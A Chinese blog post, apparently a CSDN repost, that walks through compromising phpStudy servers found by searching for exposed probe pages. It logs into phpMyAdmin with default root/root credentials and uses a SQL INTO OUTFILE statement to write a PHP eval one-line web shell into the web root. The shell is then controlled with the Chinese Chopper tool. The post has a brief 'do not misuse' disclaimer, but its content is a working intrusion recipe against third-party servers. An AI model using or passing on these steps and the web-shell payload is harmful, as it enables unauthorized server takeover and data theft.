利用phpStudy 探针 提权网站服务器

声明:

本教程仅仅是演示管理员安全意识不强,存在弱口令情况.网站被非法入侵的演示,请勿用于恶意用途!


今天看到论坛有人发布了一个通过这phpStudy 探针 关键字搜索检索提权网址服务器,这个挺简单的.记录一下吧。

搜索引擎KeyWord:

phpStudy 探针 2014

多往后翻翻。翻个几十页最好。

点开搜索到的内容。

搜索引擎

点开搜索到的内容。

翻到最下面,尝试连接mysql数据库是否正常(账号密码默认为:root):

尝试数据库账号密码

1、 如果提示正常。请在网页后面加上 ‘phpmyadmin’,如 http://www.baidu.com/phpmyadmin

2、 然后回车即可。

3、 出现以下界面;默认账号密码尝试登陆;

尝试登录

4、 登陆成功后,第一步找到左边导航栏的MYSQL,然后点击上面的SQL,如图

5、 (点击mysql后,右侧表单会增加很多内容,不要理会他,直接点表单上方的SQL按钮即可。)

登录成功,进入后台

6、 下面往SQL写入一句话木马,然后用菜刀连接即可!

向数据库插入一句话木马

1、 图片效果不好,贴出代码,自行对比一下子- – 
2、 Code:

mysq1
sql 语句
Drop TABLE IF EXISTS 菜刀连接密码;
Create TABLE 自定义一个表名(cmd text NOT NULL);
Insert INTO 自定义一个表名 (cmd) VALUES('<?php @eval($_POST[菜刀连接密码])?>');
Select cmd from 自己编写 into outfile 'D:/WWW/菜刀连接地址.php';['左边绝对地址需要根据网页自行更改']
Drop TABLE IF EXISTS 用户和密码;

1
2
3
4
5
6
7


7、 添加完成后,使用菜刀连接;

菜刀连接

后面tmp.php是在写入SQL一句话木马那自定义设置的。

成功!

成功连上!可自行提权服务器等操作!

版权声明:本文为博主原创文章,转载需注明出处。 https://blog.csdn.net/u010984277/article/details/50799537

Published by

风君子

独自遨游何稽首 揭天掀地慰生平

发表回复

您的电子邮箱地址不会被公开。 必填项已用 * 标注